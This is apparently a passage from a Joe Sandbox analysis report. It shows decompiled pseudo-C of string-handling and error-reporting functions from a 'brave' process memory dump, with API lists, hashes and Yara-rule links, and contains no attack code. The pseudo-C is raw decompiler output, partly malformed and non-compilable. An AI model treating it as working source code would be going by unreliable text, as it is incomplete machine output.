				r12d =  *(__rbx + 0x28);
				 *(__rbx + 0x18) =  &(_t204[1]);
				E00007FF67FF652B289F0(__rbx);
				if ( *( *(__rbx + 0x18)) == 0x49) goto 0x52b26584;
				 *(__rbx + 0x18) = _t204;
				_t171 = _a40;
				 *(__rbx + 0x28) = r12d;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48));
				goto 0x52b25d30;
				_t214 = _a40;
				if (_t214 == 0) goto 0x52b25c20;
				_t122 =  *(__rbx + 0x38);
				if (_t122 -  *((intOrPtr*)(__rbx + 0x3c)) >= 0) goto 0x52b25c20;
				 *((long long*)( *((intOrPtr*)(__rbx + 0x30)) + _t122 * 8)) = _t214;
				 *(__rbx + 0x38) = _t122 + 1;
				E00007FF67FF652B24DD0();
				_a40 = _t171;
				 *((intOrPtr*)(__rbx + 0x4c)) = 1;
				 *(__rbx + 0x18) = _t214 + 3;
				E00007FF67FF652B27F20(_t171, __rbx);
				_t205 = _t171;
				if (_t171 != 0) goto 0x52b26386;
				goto 0x52b25c20;
				asm("o16 nop [eax+eax]");
				_push(0x52dd53e0);
				_push(_t205);
				_push(__rbx);
				_t172 =  *(__rbx + 0x18);
				if (sil == 0) goto 0x52b266c8;
				 *(__rbx + 0x18) =  &(_t172[1]);
				r10d =  *_t172 & 0x000000ff;
				if (sil != 0) goto 0x52b266d0;
				r8d = 0x45;
				asm("o16 nop [eax+eax]");
				_t103 = (r8d >> 0x1f) + r8d >> 1;
				_t149 =  *((intOrPtr*)( *((intOrPtr*)(0x52dd4820 + (_t103 + _t103 * 2) * 8)))) - r10b;
				if (_t149 == 0) goto 0x52b26680;
				if (_t149 <= 0) goto 0x52b266c0;
				r8d = _t103;
				if (0 != r8d) goto 0x52b26648;
				return 0;
			}

0x7ff652b26306
0x7ff652b2630c
0x7ff652b26323
0x7ff652b26327
0x7ff652b2632f
0x7ff652b26332
0x7ff652b26338
0x7ff652b2633c
0x7ff652b26340
0x7ff652b2634e
0x7ff652b26350
0x7ff652b26356
0x7ff652b26369
0x7ff652b2636d
0x7ff652b26375
0x7ff652b26378
0x7ff652b26383
0x7ff652b26386
0x7ff652b2638d
0x7ff652b26393
0x7ff652b2639a
0x7ff652b2639e
0x7ff652b263b1
0x7ff652b263b6
0x7ff652b263c0
0x7ff652b263c6
0x7ff652b263dd
0x7ff652b263e1
0x7ff652b263e9
0x7ff652b263ec
0x7ff652b263f2
0x7ff652b263f6
0x7ff652b263ff
0x7ff652b26405
0x7ff652b2641c
0x7ff652b26420
0x7ff652b26428
0x7ff652b2642b
0x7ff652b26431
0x7ff652b26435
0x7ff652b2643e
0x7ff652b26444
0x7ff652b2645b
0x7ff652b2645f
0x7ff652b26467
0x7ff652b2646a
0x7ff652b26470
0x7ff652b26474
0x7ff652b26480
0x7ff652b26485
0x7ff652b26493
0x7ff652b26498
0x7ff652b264a2
0x7ff652b264a8
0x7ff652b264bf
0x7ff652b264c3
0x7ff652b264cb
0x7ff652b264ce
0x7ff652b264d4
0x7ff652b264d8
0x7ff652b264dc
0x7ff652b264eb
0x7ff652b264f0
0x7ff652b264f8
0x7ff652b26501
0x7ff652b26507
0x7ff652b26512
0x7ff652b26517
0x7ff652b2651e
0x7ff652b26522
0x7ff652b26537
0x7ff652b2653c
0x7ff652b26541
0x7ff652b26544
0x7ff652b26550
0x7ff652b26557
0x7ff652b2655e
0x7ff652b2656a
0x7ff652b2656c
0x7ff652b26570
0x7ff652b26575
0x7ff652b2657c
0x7ff652b2657f
0x7ff652b26584
0x7ff652b2658c
0x7ff652b26592
0x7ff652b26598
0x7ff652b265a8
0x7ff652b265b2
0x7ff652b265ba
0x7ff652b265bf
0x7ff652b265d0
0x7ff652b265da
0x7ff652b265de
0x7ff652b265e6
0x7ff652b265ec
0x7ff652b265f2
0x7ff652b265f7
0x7ff652b26600
0x7ff652b26601
0x7ff652b26602
0x7ff652b26607
0x7ff652b26614
0x7ff652b2661e
0x7ff652b26626
0x7ff652b2662d
0x7ff652b26633
0x7ff652b26642
0x7ff652b26656
0x7ff652b26666
0x7ff652b26669
0x7ff652b2666b
0x7ff652b2666d
0x7ff652b26673
0x7ff652b2667e

APIs

malloc.MSVCRT ref: 00007FF652B52752

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 0ebee6292a8557c15174a4ab0a03ffd8c5c9ca548531957df58a5e65fb3db361
Instruction ID: 7d924bc48ecb20ba5ed72e1fc8c50b03eb65b2693193c03ac6f982d90be990dd
Opcode Fuzzy Hash: 0ebee6292a8557c15174a4ab0a03ffd8c5c9ca548531957df58a5e65fb3db361
Instruction Fuzzy Hash: CC111572A09B01C2E7258F14EC853A932B1FF9574CF299235C28C963A9DFBCE585C794

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B263FF Relevance: 1.3, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00007FF67FF652B263FF(void* __rbx, signed char* _a40) {
				signed int _t69;
				signed int _t73;
				signed int _t75;
				signed int _t78;
				signed int _t81;
				void* _t102;
				intOrPtr* _t107;
				signed char* _t110;
				intOrPtr* _t113;
				signed char* _t114;
				signed char* _t116;
				signed char* _t117;
				signed char* _t139;
				signed char* _t140;
				long long _t147;

				_t73 =  *(__rbx + 0x28);
				if (_t73 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x52b52715;
				_t107 = (_t73 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t107 + 4)) = 0;
				 *(__rbx + 0x28) = _t73 + 1;
				 *_t107 = 0x27;
				 *((long long*)(_t107 + 0x10)) = 0x52dd5400;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 0x11;
				_t75 =  *(__rbx + 0x28);
				if (_t75 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x52b526ef;
				_t110 = (_t75 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t110 + 4)) = 0;
				 *(__rbx + 0x28) = _t75 + 1;
				 *_t110 = 0x27;
				 *((long long*)(_t110 + 0x10)) = 0x52dd53a0;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 7;
				E00007FF67FF652B25BC0();
				r9d = 0;
				E00007FF67FF652B24DD0();
				_a40 = _t110;
				_t78 =  *(__rbx + 0x28);
				if (_t78 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x52b52683;
				_t113 = (_t78 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t113 + 4)) = 0;
				 *(__rbx + 0x28) = _t78 + 1;
				 *_t113 = 0x27;
				 *((long long*)(_t113 + 0x10)) = 0x52dd53e0;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 8;
				goto 0x52b25c22;
				E00007FF67FF652B26EE0(_t113, __rbx);
				_a40 = _t113;
				if (_t113 == 0) goto 0x52b25c20;
				if ( *_t113 != 0x18) goto 0x52b25d39;
				goto 0x52b25c22;
				goto 0x52b26051;
				_t114 = _t113 + 1;
				 *(__rbx + 0x18) = _t114;
				E00007FF67FF652B289F0(__rbx);
				E00007FF67FF652B24DD0();
				_a40 = _t114;
				_t139 = _t114;
				goto 0x52b25f58;
				r12d =  *(__rbx + 0x28);
				 *(__rbx + 0x18) =  &(_t139[1]);
				E00007FF67FF652B289F0(__rbx);
				if ( *( *(__rbx + 0x18)) == 0x49) goto 0x52b26584;
				 *(__rbx + 0x18) = _t139;
				_t116 = _a40;
				 *(__rbx + 0x28) = r12d;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48));
				goto 0x52b25d30;
				_t147 = _a40;
				if (_t147 == 0) goto 0x52b25c20;
				_t81 =  *(__rbx + 0x38);
				if (_t81 -  *((intOrPtr*)(__rbx + 0x3c)) >= 0) goto 0x52b25c20;
				 *((long long*)( *((intOrPtr*)(__rbx + 0x30)) + _t81 * 8)) = _t147;
				 *(__rbx + 0x38) = _t81 + 1;
				E00007FF67FF652B24DD0();
				_a40 = _t116;
				 *((intOrPtr*)(__rbx + 0x4c)) = 1;
				 *(__rbx + 0x18) = _t147 + 3;
				E00007FF67FF652B27F20(_t116, __rbx);
				_t140 = _t116;
				if (_t116 != 0) goto 0x52b26386;
				goto 0x52b25c20;
				asm("o16 nop [eax+eax]");
				_push(0x52dd53e0);
				_push(_t140);
				_push(__rbx);
				_t117 =  *(__rbx + 0x18);
				if (sil == 0) goto 0x52b266c8;
				 *(__rbx + 0x18) =  &(_t117[1]);
				r10d =  *_t117 & 0x000000ff;
				if (sil != 0) goto 0x52b266d0;
				r8d = 0x45;
				asm("o16 nop [eax+eax]");
				_t69 = (r8d >> 0x1f) + r8d >> 1;
				_t102 =  *((intOrPtr*)( *((intOrPtr*)(0x52dd4820 + (_t69 + _t69 * 2) * 8)))) - r10b;
				if (_t102 == 0) goto 0x52b26680;
				if (_t102 <= 0) goto 0x52b266c0;
				r8d = _t69;
				if (0 != r8d) goto 0x52b26648;
				return 0;
			}

0x7ff652b263ff
0x7ff652b26405
0x7ff652b2641c
0x7ff652b26420
0x7ff652b26428
0x7ff652b2642b
0x7ff652b26431
0x7ff652b26435
0x7ff652b2643e
0x7ff652b26444
0x7ff652b2645b
0x7ff652b2645f
0x7ff652b26467
0x7ff652b2646a
0x7ff652b26470
0x7ff652b26474
0x7ff652b26480
0x7ff652b26485
0x7ff652b26493
0x7ff652b26498
0x7ff652b264a2
0x7ff652b264a8
0x7ff652b264bf
0x7ff652b264c3
0x7ff652b264cb
0x7ff652b264ce
0x7ff652b264d4
0x7ff652b264d8
0x7ff652b264dc
0x7ff652b264eb
0x7ff652b264f0
0x7ff652b264f8
0x7ff652b26501
0x7ff652b26507
0x7ff652b26512
0x7ff652b26517
0x7ff652b2651e
0x7ff652b26522
0x7ff652b26537
0x7ff652b2653c
0x7ff652b26541
0x7ff652b26544
0x7ff652b26550
0x7ff652b26557
0x7ff652b2655e
0x7ff652b2656a
0x7ff652b2656c
0x7ff652b26570
0x7ff652b26575
0x7ff652b2657c
0x7ff652b2657f
0x7ff652b26584
0x7ff652b2658c
0x7ff652b26592
0x7ff652b26598
0x7ff652b265a8
0x7ff652b265b2
0x7ff652b265ba
0x7ff652b265bf
0x7ff652b265d0
0x7ff652b265da
0x7ff652b265de
0x7ff652b265e6
0x7ff652b265ec
0x7ff652b265f2
0x7ff652b265f7
0x7ff652b26600
0x7ff652b26601
0x7ff652b26602
0x7ff652b26607
0x7ff652b26614
0x7ff652b2661e
0x7ff652b26626
0x7ff652b2662d
0x7ff652b26633
0x7ff652b26642
0x7ff652b26656
0x7ff652b26666
0x7ff652b26669
0x7ff652b2666b
0x7ff652b2666d
0x7ff652b26673
0x7ff652b2667e

APIs

malloc.MSVCRT ref: 00007FF652B52752

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 277ec0329c7c4dbc9df98e64df30877a426ff65a56704ba7fd0b275a463b7bd2
Instruction ID: 962c12d8497b11af9a425b8426a92223f7844d385fb8dca0f83f82ee4ee4d038
Opcode Fuzzy Hash: 277ec0329c7c4dbc9df98e64df30877a426ff65a56704ba7fd0b275a463b7bd2
Instruction Fuzzy Hash: E4110572A09B0182E7158F14EC843A932B1FF9574CF699235C28C97399EFBCE591C790

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FF652B229D0 Relevance: 9.1, APIs: 7, Instructions: 394COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21970e06b6a0f44cb27fbc3b878f45f4bed170ea0786f0c3e17d60ddcc91f4d1
Instruction ID: 758495415508f8b0a6e7f7b8c64a090fd73d766b440c721a95a342a1dbd2afb9
Opcode Fuzzy Hash: 21970e06b6a0f44cb27fbc3b878f45f4bed170ea0786f0c3e17d60ddcc91f4d1
Instruction Fuzzy Hash: A212A462918BC241EB118B29EC457AA67A0FF9679CF489331DE8C93795EFBCD144CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B2F6C0 Relevance: 9.0, APIs: 6, Instructions: 35
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF67FF652B2F6C0(void* __rcx) {
				long _t1;

				_t1 = GetLastError();
				if (_t1 != 0) goto 0x52b2f6e0;
				return _t1;
			}

0x7ff652b2f6ca
0x7ff652b2f6d2
0x7ff652b2f6db

APIs

GetLastError.KERNEL32 ref: 00007FF652B2F6CA
FormatMessageA.KERNEL32 ref: 00007FF652B2F70B
IsDebuggerPresent.KERNEL32 ref: 00007FF652B2F715

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: DebuggerErrorFormatLastMessagePresent
String ID:
API String ID: 2392558662-0
Opcode ID: 45af6df8f3c1be2e0205f91125e02e1abf725a7bbf325bdbd81304aa25dfb69b
Instruction ID: 1001553e9465b557a19f950d1518739db418b7591ebcd212e37d7bbc2939e2c7
Opcode Fuzzy Hash: 45af6df8f3c1be2e0205f91125e02e1abf725a7bbf325bdbd81304aa25dfb69b
Instruction Fuzzy Hash: 99016DA1A18A0681E6548B25BC5872A72A0BF99B8CF4C0234DA4DD2A64EFBCD485C710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B48100 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 73
stringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E00007FF67FF652B48100(long long* __rcx, void* __rdx, void* __r8, void* __r9, void* _a40) {

				if (__r9 - 0xfffffff9 + __r8 - __rdx -  *((intOrPtr*)( *((intOrPtr*)(__rcx)) - 0x18)) > 0) goto 0x52b48180;
				E00007FF67FF652B48580(__rcx, __rdx -  *((intOrPtr*)(__rcx)), __r8 - __rdx, __r9);
				if (__r9 == 0) goto 0x52b4815e;
				if (__r9 == 1) goto 0x52b48170;
				return memset(??, ??, ??);
			}

0x7ff652b48133
0x7ff652b4813b
0x7ff652b48143
0x7ff652b48150
0x7ff652b4816a

APIs

strlen.MSVCRT ref: 00007FF652B481A9

Part of subcall function 00007FF652B48580: memcpy.MSVCRT ref: 00007FF652B485FB

memset.MSVCRT ref: 00007FF652B48159

Strings

basic_string::_M_replace_aux, xrefs: 00007FF652B48180

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: memcpymemsetstrlen
String ID: basic_string::_M_replace_aux
API String ID: 160209724-2536181960
Opcode ID: e13b374acd0977eb9fd4fe879805c0dd20afc90dbef44aaa3ecbdcb4d051adf7
Instruction ID: ee502b720a12bec22d820ec58d3073d3bb9887d4ac442591bf22ec9da2e1ab39
Opcode Fuzzy Hash: e13b374acd0977eb9fd4fe879805c0dd20afc90dbef44aaa3ecbdcb4d051adf7
Instruction Fuzzy Hash: FF11E312F591A841ED15AA6B7C814E952112B5BFFCF9C4732EE9C6B781EC7CD882C340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B481D0 Relevance: 2.5, Strings: 2, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00007FF67FF652B481D0(long long* __rcx, void* __rdx, void* __r8, void* __r9, intOrPtr _a40) {
				void* _t5;
				intOrPtr _t24;
				intOrPtr _t27;
				intOrPtr _t35;

				_t27 = _a40;
				_t24 =  *((intOrPtr*)(__rcx));
				_t35 =  *((intOrPtr*)(_t24 - 0x18));
				if (__rdx - _t35 > 0) goto 0x52b4839f;
				_t30 =  >  ? __r8 : _t35 - __rdx;
				if (_t27 - 0xfffffff9 - _t35 + ( >  ? __r8 : _t35 - __rdx) > 0) goto 0x52b48393;
				if (_t24 - __r9 > 0) goto 0x52b48240;
				if (__r9 - _t35 + _t24 > 0) goto 0x52b48240;
				if ( *((intOrPtr*)(_t24 - 8)) <= 0) goto 0x52b48288;
				_t5 = E00007FF67FF652B48580(__rcx, __rdx,  >  ? __r8 : _t35 - __rdx, _t27);
				if (_t27 == 0) goto 0x52b48272;
				if (_t27 == 1) goto 0x52b482f0;
				0x52b41698();
				return _t5;
			}

0x7ff652b481dd
0x7ff652b481e8
0x7ff652b481f1
0x7ff652b481f8
0x7ff652b48211
0x7ff652b4821e
0x7ff652b48227
0x7ff652b4822f
0x7ff652b48236
0x7ff652b4824c
0x7ff652b48254
0x7ff652b48261
0x7ff652b4826d
0x7ff652b48282

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF652B483A9
basic_string::replace, xrefs: 00007FF652B483A2

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::replace
API String ID: 0-3564965661
Opcode ID: 52bc733c84fad3ed6fbef407dfbaf4f05d60fd4f932c361f6de10b9818d5177c
Instruction ID: 5c3c3f28d07aca44fa7f1489058ecf2b1dd399069d135de6235d265406d49ad9
Opcode Fuzzy Hash: 52bc733c84fad3ed6fbef407dfbaf4f05d60fd4f932c361f6de10b9818d5177c
Instruction Fuzzy Hash: 13F03051F08A4660DA00AF63DC448FAA322BB5BBCCF485532FE4CAB356EE68D101C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B4F1C0 Relevance: 2.5, Strings: 2, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00007FF67FF652B4F1C0(void* __rcx, intOrPtr* __rdx, signed int __r8, void* __r9) {
				long long _v24;
				void* _t8;
				void* _t13;
				intOrPtr _t22;

				_t22 =  *((intOrPtr*)(__rdx + 8));
				_t13 = _t22 - __r8;
				_t20 =  <=  ? _t13 : __r9;
				if (__r8 - _t22 > 0) goto 0x52b4f1f6;
				_v24 =  <=  ? _t13 : __r9;
				return E00007FF67FF652B4DEF0(0, _t8, __rcx, __rdx,  *((intOrPtr*)(__rcx + 8)),  *__rdx + __r8 * 2);
			}

0x7ff652b4f1c4
0x7ff652b4f1cb
0x7ff652b4f1d1
0x7ff652b4f1db
0x7ff652b4f1dd
0x7ff652b4f1f5

Strings

basic_string::assign, xrefs: 00007FF652B4F1F9
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF652B4F200

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::assign
API String ID: 3510742995-2669816585
Opcode ID: 8a923c3d374cfffc7e0aa0d47eacc92a0f8a036f2f6f80d67fa431de05af8495
Instruction ID: c15dbd8ee9db8baa964dba0d81ab196687c137e6f12a693be509079b0b4eb28e
Opcode Fuzzy Hash: 8a923c3d374cfffc7e0aa0d47eacc92a0f8a036f2f6f80d67fa431de05af8495
Instruction Fuzzy Hash: B9F06266F05A8591DA00AF65DC410986321F759F4CF884122DE8C63321DE7CD562CB04

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B4C000 Relevance: 2.5, Strings: 2, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00007FF67FF652B4C000(void* __rcx, intOrPtr* __rdx, void* __r8, void* __r9) {
				long long _v24;
				void* _t7;
				void* _t12;
				intOrPtr _t21;

				_t21 =  *((intOrPtr*)(__rdx + 8));
				_t12 = _t21 - __r8;
				_t19 =  <=  ? _t12 : __r9;
				if (__r8 - _t21 > 0) goto 0x52b4c036;
				_v24 =  <=  ? _t12 : __r9;
				return E00007FF67FF652B4AE20(0, _t7, __rcx, __rdx,  *((intOrPtr*)(__rcx + 8)),  *__rdx + __r8);
			}

0x7ff652b4c004
0x7ff652b4c00b
0x7ff652b4c011
0x7ff652b4c01b
0x7ff652b4c01d
0x7ff652b4c035

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF652B4C040
basic_string::assign, xrefs: 00007FF652B4C039

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

